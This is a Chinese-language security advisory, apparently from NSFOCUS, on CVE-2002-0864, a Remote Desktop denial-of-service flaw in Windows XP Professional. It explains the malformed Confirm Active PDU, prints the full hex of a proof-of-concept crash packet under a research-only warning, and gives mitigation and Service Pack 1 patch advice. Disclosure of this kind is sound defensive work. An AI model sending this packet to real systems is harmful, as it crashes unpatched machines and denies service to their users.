首页 -> 安全研究
安全研究
安全漏洞
Microsoft Windows XP Professional远程桌面拒绝服务攻击漏洞
发布日期:2002-09-16
更新日期:2002-09-20
受影响系统:
Microsoft Windows XP Professional不受影响系统:
Microsoft Windows .NET Standard Server Beta 3
Microsoft Windows XP Professional SP1描述:
BUGTRAQ ID: 5713
CVE(CAN) ID: CVE-2002-0864
远程桌面是Windows XP专业版的单用户RDP服务(Terminal Services)。
Windows XP专业版远程桌面服务存在漏洞,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
在启动协议的时候客户端和服务器会进行图形处理能力进行协商,发送的包中包含PDU Confirm Active数据单元,这个段的32字节允许客户端设置选项如在不支持画图(drawing)命令的情况下关闭这个命令。
其中之一的判断是是否发送图案BLT命令,在Windows 2000 Server中,关闭这个命令可以让服务端发送bitmaps来代替图案BLT命令,但是当发送在包中指定图案BLT命令给Windows XP专业版时,会导致Windows XP专业版系统在为登录屏幕进行着色图案操作时崩溃,产生拒绝服务。
这个问题也存在于Microsoft Windows .NET Standard Server Beta 3系统中。
<*来源:Ben Cohen (bc@skygate.co.uk)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103235745116592&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01"
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 关闭使用远程桌面。
厂商补丁:
Microsoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Microsoft Upgrade Windows XP Service Pack 1
http://www.microsoft.com/WindowsXP/pro/downloads/servicepacks/sp1/default.asp
浏览次数:3195
严重程度:0(网友投票)
绿盟科技给您安全的保障